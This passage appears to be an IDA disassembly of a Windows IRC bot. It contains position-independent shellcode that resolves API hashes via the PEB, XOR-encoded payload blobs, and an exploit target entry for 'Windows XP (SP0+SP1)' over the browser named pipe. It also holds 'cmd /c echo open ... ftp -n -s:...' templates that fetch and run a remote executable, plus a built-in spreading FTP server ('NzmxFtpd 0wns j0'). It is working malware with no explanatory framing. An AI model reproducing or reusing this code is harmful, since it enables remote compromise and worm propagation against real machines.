mov esi, [ebx+ecx*4]
add esi, ebp
xor edi, edi
xor eax, eax
cld
loc_4288E5: ; CODE XREF: sub_4288C2+2D�j
lodsb
cmp al, ah
jz short loc_4288F1
ror edi, 0Dh
add edi, eax
jmp short loc_4288E5
; ---------------------------------------------------------------------------
loc_4288F1: ; CODE XREF: sub_4288C2+26�j
cmp edi, [esp+20h+arg_0]
jnz short loc_4288D8
mov ebx, [edx+24h]
add ebx, ebp
mov cx, [ebx+ecx*2]
mov ebx, [edx+1Ch]
add ebx, ebp
mov eax, [ebx+ecx*4]
add eax, ebp
mov [esp+20h+var_4], eax
popa
retn 8
; ---------------------------------------------------------------------------
loc_428912: ; CODE XREF: sub_4288C2:loc_4288D8�j
; sub_4288C2:loc_428912�j
jmp short loc_428912
sub_4288C2 endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
sub_428918 proc near ; DATA XREF: _0:004042BF�o
arg_0 = dword ptr 4
add esp, 0FFFFF254h
cld
call sub_42896A
mov eax, [ebp+3Ch]
mov edi, [ebp+eax+78h]
add edi, ebp
mov ecx, [edi+18h]
mov ebx, [edi+20h]
add ebx, ebp
loc_428935: ; CODE XREF: sub_428918+38�j
jecxz short loc_428965
dec ecx
mov esi, [ebx+ecx*4]
add esi, ebp
xor eax, eax
cdq
loc_428940: ; CODE XREF: sub_428918+32�j
lodsb
test al, al
jz short loc_42894C
ror edx, 0Dh
add edx, eax
jmp short loc_428940
; ---------------------------------------------------------------------------
loc_42894C: ; CODE XREF: sub_428918+2B�j
cmp edx, [esp+arg_0]
jnz short loc_428935
mov ebx, [edi+24h]
add ebx, ebp
mov cx, [ebx+ecx*2]
mov ebx, [edi+1Ch]
add ebx, ebp
mov ebx, [ebx+ecx*4]
add ebx, ebp
loc_428965: ; CODE XREF: sub_428918:loc_428935�j
mov [esp+arg_0], ebx
retn
sub_428918 endp
; =============== S U B R O U T I N E =======================================
sub_42896A proc near ; CODE XREF: sub_428918+7�p
; FUNCTION CHUNK AT 004289A2 SIZE 00000007 BYTES
xor eax, eax
mov eax, fs:[eax+30h]
test eax, eax
js short loc_428983
mov eax, [eax+0Ch]
mov esi, [eax+1Ch]
lodsd
mov ebp, [eax+8]
jmp loc_42898E
; ---------------------------------------------------------------------------
loc_428983: ; CODE XREF: sub_42896A+8�j
mov eax, [eax+34h]
add eax, 7Ch
mov ebp, [eax+3Ch]
loc_42898E: ; CODE XREF: sub_42896A+14�j
pop edi
xor esi, esi
pusha
push esi
jmp short loc_4289A2
sub_42896A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_428995 proc near ; CODE XREF: sub_42896A:loc_4289A2�p
push 60E0CEEFh
push 0E8AFE98h
push edi
jmp edi
sub_428995 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42896A
loc_4289A2: ; CODE XREF: sub_42896A+29�j
call sub_428995
loc_4289A7: ; DATA XREF: sub_403A35+1B�o
; sub_40EE72+822�o
add [ebx], ah
; END OF FUNCTION CHUNK FOR sub_42896A
; ---------------------------------------------------------------------------
db 3 dup(0)
dword_4289AC dd 60h ; DATA XREF: sub_403A90+320�o
dword_4289B0 dd 62B0606h, 2050501h, 0A0h ; DATA XREF: sub_403A90+2F5�o
dword_4289BC dd 30h ; DATA XREF: sub_403A90+2CA�o
; _2:0042FA1C�o
dword_4289C0 dd 0A1h ; DATA XREF: sub_403A90+29F�o
dword_4289C4 dd 3 ; DATA XREF: sub_403A90+246�o
aCccc db 'CCCC',0 ; DATA XREF: sub_403A90+153�o
align 10h
loc_4289D0: ; DATA XREF: sub_403A90+E8�o
jmp short near ptr dword_4289D8
; ---------------------------------------------------------------------------
align 8
dword_4289D8 dd 0 ; CODE XREF: _2:loc_4289D0�j
aCmdCEchoOpenSD db 'cmd /c echo open %s %d >> ii &echo user 1 1 >> ii &echo get %s >>'
; DATA XREF: _0:004042E4�o
; sub_404E54+92�o ...
db ' ii &echo bye >> ii &ftp -n -v -s:ii &del ii &%s',0Dh,0Ah,0
dword_428A50 dd 0E983C933h, 0D9EED9AFh, 5BF42474h ; DATA XREF: sub_40494F+2B0�o
; ---------------------------------------------------------------------------
loc_428A5C: ; CODE XREF: _2:00428A66�j
xor dword ptr [ebx+13h], 6AD31EBBh
sub ebx, 0FFFFFFFCh
loop loc_428A5C
inc edi
jz short loc_428AA3
and eax, 952CE753h
inc esp
jle short loc_428ACB
push es
lahf
cmp bl, [eax+2Fh]
xchg edx, [ebp+1FC36FAFh]
cmp al, 0E1h
; ---------------------------------------------------------------------------
dd 355806F4h, 89381F9Bh, 5E58578Bh, 5B3D1F30h, 0EE7F877Bh
dd 0ABD46A7Bh, 0A8D21371h, 3EE8EA50h
; ---------------------------------------------------------------------------
lahf
cmps byte ptr ss:[esi], byte ptr es:[edi]
loc_428AA3: ; CODE XREF: _2:00428A69�j
mov [eax], esi
inc ecx
imul dword ptr [ebx+50h]
js short near ptr loc_428B02+1
lock xchg ax, bp
; ---------------------------------------------------------------------------
dw 768Ch
dd 46D0F5BAh, 4EBF9730h, 5B107FA7h, 2A587A7Bh, 6693958Bh
dd 0C7CF6E30h
; ---------------------------------------------------------------------------
loc_428AC8: ; CODE XREF: _2:00428AF5�j
xor [esi-25h], bl
loc_428ACB: ; CODE XREF: _2:00428A71�j
xor al, 0D3h
nop
popf
db 64h
push edi
dec esi
sub al, 0BCh
mov al, ch
mov ch, 39h
fnsave byte ptr [esi-20h]
pop eax
shr dword ptr [ecx-60h], cl
pop eax
in al, 4Ah
sub al, 0BAh
loc_428AE4: ; CODE XREF: _2:00428B17�j
rcl ebp, cl
db 3Eh
xchg eax, esi
or byte ptr [esi+2Ch], 0BCh
in al, 97h
db 36h
or al, 3Ah
rep fld tbyte ptr [eax-12h]
jz short loc_428AC8
xchg eax, ebp
imul esi, [esi+0Ah], 63h
dec esi
mov bl, 84h
xchg eax, ebp
insd
dec ebp
loc_428B02: ; CODE XREF: _2:00428AA9�j
cmp byte ptr [ecx], 0E8h
dec ebp
nop
cmp eax, edi
dec ebp
sub al, 0BAh
fnsave byte ptr [esi-2Dh]
paddusw mm1, qword ptr [ebp+5Ah]
mov ebp, [esi]
jbe short loc_428B8E
jo short loc_428AE4
fld dword ptr [ebp+edx*4+3BC3746Dh]
out dx, al
loope near ptr loc_428B25+1
add bl, [edi]
loc_428B25: ; CODE XREF: _2:00428B21�j
mov bl, 0FDh
sub esp, 0FFFFFFE1h
add eax, 3E1EE39h
add bl, [esi+57h]
push ebp
and ebp, esp
loope near ptr loc_428B3A+2
cmp ch, bh
dec edx
loc_428B3A: ; CODE XREF: _2:00428B35�j
xchg dl, [ebp-72447295h]
retn 0AAD8h
; ---------------------------------------------------------------------------
db 3Dh
dd 9586C844h, 0EB9786Bh, 7B076DDh, 3AB9FB32h, 0E31F37E2h
dd 0E397745Ch, 99132F59h, 4791E011h, 0F9FF5C45h, 0C1EB6436h
dd 18BBB510h, 95C5AD45h, 0BC2C5ACEh, 3B8149E0h, 6BB94FEAh
dd 3B864FEAh, 0C7BBCE44h, 391D1B62h
db 44h, 0C8h
; ---------------------------------------------------------------------------
loc_428B8E: ; CODE XREF: _2:00428B15�j
mov ecx, 2C294495h
mov edx, 0E92F4930h
jg short loc_428C14
sub al, 0BCh
jmp near ptr 54448F82h
; ---------------------------------------------------------------------------
db 0D0h, 33h, 0Ah
dd 9505E1E8h, 6AD31E6Bh, 0
dword_428BB0 dd 0EFFFC481h, 44FFFFh, 428BFCh ; DATA XREF: sub_40494F+297�o
dword_428BBC dd 42Ah ; DATA XREF: sub_40494F+24A�r
dword_428BC0 dd 3E8h ; DATA XREF: sub_40494F+2BB�r
dword_428BC4 dd 258h ; DATA XREF: sub_40494F+28D�r
byte_428BC8 db 0 ; DATA XREF: sub_40494F+1F6�r
; sub_40494F+2C4�r
align 4
dd offset aWindowsXpSp0Sp ; "Windows XP (SP0+SP1)"
dd 2C6h, 264h, 0
dd 1
dword_428BE0 dd 20804h ; DATA XREF: sub_404853�r
; sub_40494F+2E2�o ...
aWindowsXpSp0Sp db 'Windows XP (SP0+SP1)',0 ; DATA XREF: _2:00428BCC�o
align 4
dd 646E6957h, 2073776Fh, 2C34544Eh, 30303220h, 53282030h
dd 532D3050h
; ---------------------------------------------------------------------------
loc_428C14: ; CODE XREF: _2:00428B98�j
push eax
xor al, 29h
loc_428C17: ; DATA XREF: sub_40494F+21E�o
add bl, ch
add al, [eax]
; ---------------------------------------------------------------------------
db 0
align 10h
dword_428C20 dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 0 ; DATA XREF: sub_40494F+14E�o
dword_428C34 dd 4B324FC8h, 1D31670h, 475A7812h, 88E16EBFh, 0 ; DATA XREF: sub_40494F+F2�o
aSPipeBrowser db '\\%s\pipe\browser',0 ; DATA XREF: sub_40494F+81�o
align 4
a_: ; DATA XREF: sub_40494F+10�o
; sub_406387+252�o
unicode 0, <.>,0
dword_428C60 dd 200F1001h, 0Ah, 1001802h, 0 ; DATA XREF: _0:004050E2�o
dd 14002400h, 0D9D2C9B7h, 34EF333Eh, 431F25h, 2F5C0202h
dd 3Fh dup(61616161h), 62616161h, 40h dup(62626262h), 22220101h
dd 3Fh dup(22222222h), 1222222h, 64646401h, 2Dh dup(64646464h)
db 2 dup(64h)
word_429042 dw 6464h ; DATA XREF: _2:00428641�o
dd 11h dup(64646464h), 1016464h, 40h dup(65656565h), 66010165h
dd 40h dup(66666666h), 67670101h, 3Fh dup(67676767h), 1676767h
dd 68686801h, 3Fh dup(68686868h), 1016868h, 40h dup(69696969h)
dd 6A010169h, 40h dup(6A6A6A6Ah), 6B6B0101h, 3Fh dup(6B6B6B6Bh)
dd 16B6B6Bh, 6C6C6C01h, 8 dup(6C6C6C6Ch), 41416C6Ch, 100D06EBh
dd 6D6D501Eh, 0E983C933h, 0D9EED9B0h, 5BF42474h, 0C8137381h
dd 83877FD9h, 0F4E2FCEBh, 0CA94B334h, 78802020h, 0EBF4B937h
dd 0C2F4FDECh, 820352F4h, 0C90D8B0h, 0D8F4C187h, 0CE94D8E8h
dd 86F4ED43h, 1EBFE826h, 0F3BF5D64h, 8AB518CFh, 73941BC9h
dd 0AF5B8DF3h, 0D8F43CBDh, 0E194D8ECh, 0C34D543h, 6C7EC597h
dd 0EF4F5CBh, 0E663FDA4h, 0E3A4E80Bh, 0C4F9A43h, 0F7F4D588h
dd 0C7F474D4h, 91787C0h, 0D793D786h, 0D4190F37h, 0B54CB1AEh
dd 0B50CAEA0h, 57808D97h, 7B9212A0h, 518089F3h, 0E19A5097h
dd 85773449h, 787DB39Dh, 8EA6B118h, 7828743Dh, 0D42C8A1Eh
dd 0D43C8A9Bh, 57808A8Bh, 0EC5EB1AEh, 66F68AAEh, 9DDBB15Dh
dd 78281EB8h, 0D66FB31Eh, 0EFAF269Dh, 6E51746Ch, 0D4A9269Fh
dd 0EFAF269Dh, 0CEF9902Dh, 0D7A9269Fh, 782A8D9Ch, 60174A18h
dd 0D0061FB1h, 782A0F37h, 0E315BF18h, 0EA1CB1AEh, 0D7153C41h
dd 0EB3F091h, 0E3BB32Fh, 74BFE82Ah, 0AA3D2762h, 14539B36h
dd 2C47A345h, 0F5177263h, 78696A36h, 51809DBDh, 0D62D8E93h
dd 86158899h, 0D62A8899h, 2A170937h, 0D4B1DC11h, 78150F37h
dd 5780EE37h, 4838E43h, 5180BD0Ch, 0EFAF269Ah, 0D87B5338h
dd 78A9269Bh, 877FD918h
aMmmmmmmmmmmmmm db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm',0
align 4
loc_429E74: ; DATA XREF: _0:00405319�o
add al, 54h
dec eax
inc ebx
push esp
dec eax
inc ebx
push esp
dec eax
inc ebx
push esp
dec eax
inc ebx
push esp
dec eax
inc ebx
push esp
dec eax
inc ebx
push esp
dec eax
inc ebx
push esp
dec eax
inc ebx
push esp
dec eax
inc ebx
push esp
dec eax
loc_429E92: ; CODE XREF: _2:00429EE2�j
inc ebx
push esp
dec eax
inc ebx
push esp
dec eax
inc ebx
push esp
dec eax
inc ebx
push esp
dec eax
inc ebx
push esp
dec eax
inc ebx
push esp
dec eax
inc ebx
push esp
dec eax
inc ebx
push esp
dec eax
inc ebx
push esp
dec eax
inc ebx
push esp
dec eax
inc ebx
push esp
dec eax
inc ebx
push esp
dec eax
inc ebx
push esp
dec eax
inc ebx
push esp
dec eax
inc ebx
push esp
dec eax
inc ebx
push esp
dec eax
inc ebx
push esp
dec eax
inc ebx
push esp
dec eax
inc ebx
push esp
dec eax
inc ebx
push esp
dec eax
inc ebx
push esp
dec eax
inc ebx
push esp
dec eax
inc ebx
fmul st(1), st
mov al, 42h
jmp short loc_429EE9
; ---------------------------------------------------------------------------
dec edx
inc ebx
push esp
dec eax
inc ebx
and [ecx], eax
jo short loc_429E92
inc edx
add [eax-52h], esi
inc edx
loc_429EE9: ; CODE XREF: _2:00429ED9�j
mov edi, esp
add edi, 2Ch
sub sp, 204h
xor ecx, ecx
mov dl, 35h
add cx, 138h
loc_429EFC: ; CODE XREF: _2:00429F03�j
mov bl, [edi]
xor bl, dl
mov [edi], bl
inc edi
loop loc_429EFC
ficom word ptr [esi]
dec edi
pop esp
aaa
xor [ecx+6Ch], bl
int 28h ; DOS 2+ internal - KEYBOARD BUSY LOOP
test eax, 79E4B9EBh
inc ebp
loope loc_429F4D
lds edx, [edx]
adc eax, 623D0515h
db 66h
pop es
push 6
pop es
assume es:_5
sbb esi, [ecx+79h]
jns short near ptr loc_429F59+3
fidiv word ptr [eax]
fxch4 st(4)
retf 0CACAh
; ---------------------------------------------------------------------------
db 68h
dd 5F1FD8B6h, 0BE516C05h, 3975BE34h, 982945BEh, 0B83D4DBEh
dd 2EBE096Ah, 6EBECE34h
; ---------------------------------------------------------------------------
dec ebp
loc_429F4D: ; CODE XREF: _2:00429F15�j
xor al, 0CEh
mov esi, 0CC34297Eh
mov esi, 0CF341166h
loc_429F59: ; CODE XREF: _2:00429F26�j
db 64h, 67h
mov si, 156Eh
xor al, 0CEh
add al, 0FCh
jz short near ptr loc_429F67+2
cmc
lodsb
loc_429F67: ; CODE XREF: _2:00429F63�j
mov esi, 0CB34BE01h
cdq
add al, 0F7h
in al, 0D7h
mov cl, 0F5h
inc eax
retn 833Ah
; ---------------------------------------------------------------------------
db 70h
dd 7071B830h, 250C5331h, 453D440h, 6B6D6F25h, 1E676563h
dd 3A74257Bh, 0BE7F3982h, 0CD34BD31h, 3078833Ah, 0EDB871BCh
dd 403078CBh, 3178CB8Bh, 78CB1441h, 2D68B817h, 0BCE5CA66h
dd 6D315FF2h, 0B53070BDh, 0B83F4270h, 5EB54168h, 4DDC2113h
dd 0BCCACACAh, 66EE04FBh, 63666666h, 0E5CA6373h, 536D60A2h
dd 255F05BCh, 60CA6260h, 62637BE1h, 66F960CAh, 60CA6260h
dd 70B8A2E5h, 60CA65BDh, 0CA6060D1h, 71B8DD60h, 66A13930h
dd 4D501B5Dh, 56695D50h, 4A15158h, 0F970B8E7h, 626262A1h
dd 0F3CB6666h, 0A167C734h, 654D70B8h, 65BD70B8h, 66663D84h
dd 0FBCB255Fh, 66666667h, 0D960CA60h, 60CACA5Fh, 0D5h
word_42A040 dw 7A69h ; DATA XREF: sub_405144+30�r
align 4
aEchoOpenSDOE_0 db 'echo open %s %d > o&echo user 1 1 >> o &echo get bling.exe >> o &'
; DATA XREF: sub_405144+97�o
db 'echo quit >> o &ftp -n -s:o &bling.exe',0Dh,0Ah,0
align 10h
unk_42A0B0 db 2 ; DATA XREF: _0:00405367�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 25h, 73h, 2Eh
db 65h ; e
db 1Fh, 78h, 1Fh
db 70h ; p
db 29h, 20h, 2
db 0BBh ;
db 0BBh, 2, 20h
aAttemptingToRo db 'attempting to root %s',0
align 10h
a221GoodbyeHapp db '221 Goodbye happy r00ting.',0Ah,0 ; DATA XREF: sub_4053D5+5D0�o
aQuit db 'QUIT',0 ; DATA XREF: sub_4053D5+5BC�o
; sub_40EE72+537�o
align 4
a425CanTOpenDat db '425 Can',27h,'t open data connection.',0Ah,0
; DATA XREF: sub_4053D5+5AF�o
align 4
unk_42A128 db 3 ; DATA XREF: sub_4053D5+564�o
db 33h, 6Eh, 2
db 7Ah ; z
db 1Fh, 6Dh, 1Fh
db 20h
db 28h, 66h, 74h
db 70h ; p
db 64h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 3, 34h
aSPortDNowExecu db ' %s, port:%d now executing %s on remote ABOSAL7.',0
a226TransferC_0 db '226 Transfer complete.',0Ah,0 ; DATA XREF: sub_4053D5+545�o
a150OpeningBina db '150 Opening BINARY mode data connection',0Ah,0
; DATA XREF: sub_4053D5+519�o
align 4
aRetr db 'RETR',0 ; DATA XREF: sub_4053D5+501�o
align 10h
a200PortCommand db '200 PORT command successful.',0Ah,0 ; DATA XREF: sub_4053D5+4EC�o
align 10h
aS_S_S_S db '%s.%s.%s.%s',0 ; DATA XREF: sub_4053D5+4DB�o
aXX db '%x%x',0Ah,0 ; DATA XREF: sub_4053D5+4A8�o
align 4
aS db '%*s %[^,],%[^,],%[^,],%[^,],%[^,],%[^',0Ah ; DATA XREF: sub_4053D5+464�o
db ']',0
aPort db 'PORT',0 ; DATA XREF: sub_4053D5+42B�o
align 4
a226TransferCom db '226 Transfer complete',0Ah,0 ; DATA XREF: sub_4053D5+3FD�o
align 4
aList db 'LIST',0 ; DATA XREF: sub_4053D5+3EA�o
align 4
a425PassiveNotS db '425 Passive not supported on this server',0Ah,0
; DATA XREF: sub_4053D5+3AF�o
align 10h
aPasv db 'PASV',0 ; DATA XREF: sub_4053D5+39C�o
align 4
a200TypeSetToI_ db '200 Type set to I.',0Ah,0 ; DATA XREF: sub_4053D5+38C�o
aI: ; DATA XREF: sub_4053D5+378�o
unicode 0, <I>,0
a200TypeSetToA_ db '200 Type set to A.',0Ah,0 ; DATA XREF: sub_4053D5+351�o
aA: ; DATA XREF: sub_4053D5+33D�o
unicode 0, <A>,0
aType db 'TYPE',0 ; DATA XREF: sub_4053D5+326�o
; sub_4053D5+361�o
align 10h
a257IsCurrentDi db '257 "/" is current directory.',0Ah,0 ; DATA XREF: sub_4053D5+316�o
align 10h
off_42A2D0 dd offset dword_445750 ; DATA XREF: sub_4053D5+302�o
a350Restarting_ db '350 Restarting.',0Ah,0 ; DATA XREF: sub_4053D5+2F2�o
align 4
aRest db 'REST',0 ; DATA XREF: sub_4053D5+2DE�o
align 10h
a215Nzmxftpd db '215 NzmxFtpd',0Ah,0 ; DATA XREF: sub_4053D5+2CE�o
align 10h
aSyst db 'SYST',0 ; DATA XREF: sub_4053D5+2BA�o
align 4
a230UserLoggedI db '230 User logged in.',0Ah,0 ; DATA XREF: sub_4053D5+2AA�o
align 10h
aPass db 'PASS',0 ; DATA XREF: sub_4053D5+296�o
align 4
a331PasswordReq db '331 Password required',0Ah,0 ; DATA XREF: sub_4053D5+286�o
align 10h
aUser_0 db 'USER',0 ; DATA XREF: sub_4053D5+271�o
; _2:0042F834�o
align 4
aSS db '%s %s',0 ; DATA XREF: sub_4053D5+260�o
align 10h
a220Nzmxftpd0wn db '220 NzmxFtpd 0wns j0',0Ah,0 ; DATA XREF: sub_4053D5+1D8�o
align 4
aRb db 'rb',0 ; DATA XREF: sub_405A58+24�o
; sub_406C19+12E�o ...
align 4
unk_42A36C db 2 ; DATA XREF: sub_405AF2+3F8�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 68h, 2 dup(74h)
db 70h ; p
db 64h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ;
db 2, 2 dup(20h)
aErrorServerFai db 'Error: server failed, returned: <%d>.',0
align 10h
asc_42A3B0 db 0Dh,0Ah,0 ; DATA XREF: sub_405AF2+2CF�o
align 4
asc_42A3B4: ; DATA XREF: sub_405AF2+293�o
; sub_40EE72+A8�o ...
unicode 0, < >,0
aGet db 'GET ',0 ; DATA XREF: sub_405AF2+269�o
align 10h
aHttp1_0200Ok_0 db 'HTTP/1.0 200 OK',0Dh,0Ah ; DATA XREF: sub_405F4D+F7�o
db 'Server: myBot',0Dh,0Ah
db 'Cache-Control: no-cache,no-store,max-age=0',0Dh,0Ah
db 'pragma: no-cache',0Dh,0Ah
db 'Content-Type: %s',0Dh,0Ah
db 'Content-Length: %i',0Dh,0Ah
db 'Accept-Ranges: bytes',0Dh,0Ah
db 'Date: %s %s GMT',0Dh,0Ah
db 'Last-Modified: %s %s GMT',0Dh,0Ah
db 'Expires: %s %s GMT',0Dh,0Ah
db 'Connection: close',0Dh,0Ah
db 0Dh,0Ah,0
align 10h
aHttp1_0200OkSe db 'HTTP/1.0 200 OK',0Dh,0Ah ; DATA XREF: sub_405F4D+D4�o
db 'Server: myBot',0Dh,0Ah
db 'Cache-Control: no-cache,no-store,max-age=0',0Dh,0Ah
db 'pragma: no-cache',0Dh,0Ah
db 'Content-Type: %s',0Dh,0Ah
db 'Accept-Ranges: bytes',0Dh,0Ah
db 'Date: %s %s GMT',0Dh,0Ah
db 'Last-Modified: %s %s GMT',0Dh,0Ah
db 'Expires: %s %s GMT',0Dh,0Ah
db 'Connection: close',0Dh,0Ah
db 0Dh,0Ah,0
align 4
aHhMmSs db 'HH:mm:ss',0 ; DATA XREF: sub_405F4D+98�o
; sub_40B8D8+1AE�o
align 4
aDddDdMmmYyyy db 'ddd, dd MMM yyyy',0 ; DATA XREF: sub_405F4D+84�o
align 4
aApplicationOct db 'application/octet-stream',0 ; DATA XREF: sub_405F4D:loc_405FB3�o
align 4
aTextHtml db 'text/html',0 ; DATA XREF: sub_405F4D+5F�o
align 4
unk_42A5D4 db 2 ; DATA XREF: sub_4060D0+296�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 68h, 2 dup(74h)
db 70h ; p
db 64h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ;
db 2, 2 dup(20h)
aFailedToStartW db 'Failed to start worker thread, error: <%d>.',0
unk_42A61C db 2 ; DATA XREF: sub_4060D0+212�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 68h, 2 dup(74h)
db 70h ; p
db 64h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ;
db 2, 2 dup(20h)
aWorkerThreadOf db 'Worker thread of server thread: %d.',0
asc_42A65C: ; DATA XREF: sub_4060D0+15A�o
unicode 0, <*>,0
asc_42A660: ; DATA XREF: sub_4060D0+FB�o
; sub_406387+29�o ...
dw 0Ah
unicode 0, <>,0
aSS_2 db '%s%s',0 ; DATA XREF: sub_4060D0+EA�o
; sub_406387+4DA�o ...
align 4
aS_3 db '%s',0 ; DATA XREF: sub_4060D0+3A�o
; sub_40B390+4C�o ...
align 10h
aS_4 db '\%s',0 ; DATA XREF: sub_4060D0+2F�o
aFoundIFilesAnd db 'Found: %i Files and %i Directories',0Dh,0Ah,0
; DATA XREF: sub_406387+652�o
align 4
aTrTdColspan3_0 db '<TR>',0Dh,0Ah ; DATA XREF: sub_406387+637�o
db '<TD COLSPAN="3"><HR></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah
db '</TABLE>',0Dh,0Ah
db '</BODY>',0Dh,0Ah
db '</HTML>',0Dh,0Ah,0
align 4
aPrivmsgSFoundS db 'PRIVMSG %s :Found %s Files and %s Directories',0Ah,0
; DATA XREF: sub_406387+61C�o
align 4
a31s21sIBytes db '%-31s %-21s (%i bytes)',0Dh,0Ah,0 ; DATA XREF: sub_406387+58D�o
align 10h
aTdTdWidthDCo_0 db '</TD>',0Dh,0Ah ; DATA XREF: sub_406387+571�o
db '<TD WIDTH="%d"><CODE>%s</CODE></TD>',0Dh,0Ah
db '<TD WIDTH="%d" ALIGN="right"><CODE>%dk</CODE></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
aCodeSCodeA_0 db '"><CODE>%s</CODE></A>',0 ; DATA XREF: sub_406387:loc_4068AF�o
align 10h
aCode_30sGtCode db '"><CODE>%.30s></CODE></A>',0 ; DATA XREF: sub_406387+521�o
align 10h
aPrivmsgS31s2_0 db 'PRIVMSG %s :%-31s %-21s (%s bytes)',0Ah,0 ; DATA XREF: sub_406387+46E�o
align 4
a31s21s db '%-31s %-21s',0Dh,0Ah,0 ; DATA XREF: sub_406387+42F�o
align 4
aTdTdWidthDCode db '</TD>',0Dh,0Ah ; DATA XREF: sub_406387+3F9�o
db '<TD WIDTH="%d"><CODE>%s</CODE></TD>',0Dh,0Ah
db '<TD WIDTH="%d" ALIGN="right"><CODE>-</CODE></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
align 10h
aCodeSCodeA db '"><CODE>%s/</CODE></A>',0 ; DATA XREF: sub_406387:loc_406741�o
align 4
aCode_29sGtCode db '"><CODE>%.29s>/</CODE></A>',0 ; DATA XREF: sub_406387+3B3�o
align 4
aSS_0 db '%s%s/',0 ; DATA XREF: sub_406387+36C�o
align 10h
aTrTdWidthDAHre db '<TR>',0Dh,0Ah ; DATA XREF: sub_406387+328�o
; sub_406387+496�o
db '<TD WIDTH="%d"><A HREF="',0
align 10h
aPrivmsgS31s21s db 'PRIVMSG %s :%-31s %-21s',0Ah,0 ; DATA XREF: sub_406387+310�o
align 4
aS_0 db '<%s>',0 ; DATA XREF: sub_406387+2E9�o
; sub_406387+40B�o
align 4
a2_2d2_2d4d2_2d db '%2.2d/%2.2d/%4d %2.2d:%2.2d %s',0 ; DATA XREF: sub_406387+2BF�o
aAm db 'AM',0 ; DATA XREF: sub_406387+295�o
align 4
aPm db 'PM',0 ; DATA XREF: sub_406387+28A�o
align 4
a__ db '..',0 ; DATA XREF: sub_406387+237�o
align 10h
aTrTdColspan3AH db '<TR>',0Dh,0Ah ; DATA XREF: sub_406387+1C5�o
db '<TD COLSPAN="3"><A HREF="%s"><CODE>Parent Directory</CODE></A></T'
db 'D>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
align 4
aSearchingForS db 'Searching for: %s',0Dh,0Ah,0 ; DATA XREF: sub_406387+149�o
aTrTdColspan3Hr db '<TR>',0Dh,0Ah ; DATA XREF: sub_406387+12D�o
db '<TD COLSPAN="3"><HR></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
align 4
aTrTdWidthDCode db '<TR>',0Dh,0Ah ; DATA XREF: sub_406387+F9�o
db '<TD WIDTH="%d"><CODE>Name</CODE></TD>',0Dh,0Ah
db '<TD WIDTH="%d"><CODE>Last Modified</CODE></TD>',0Dh,0Ah
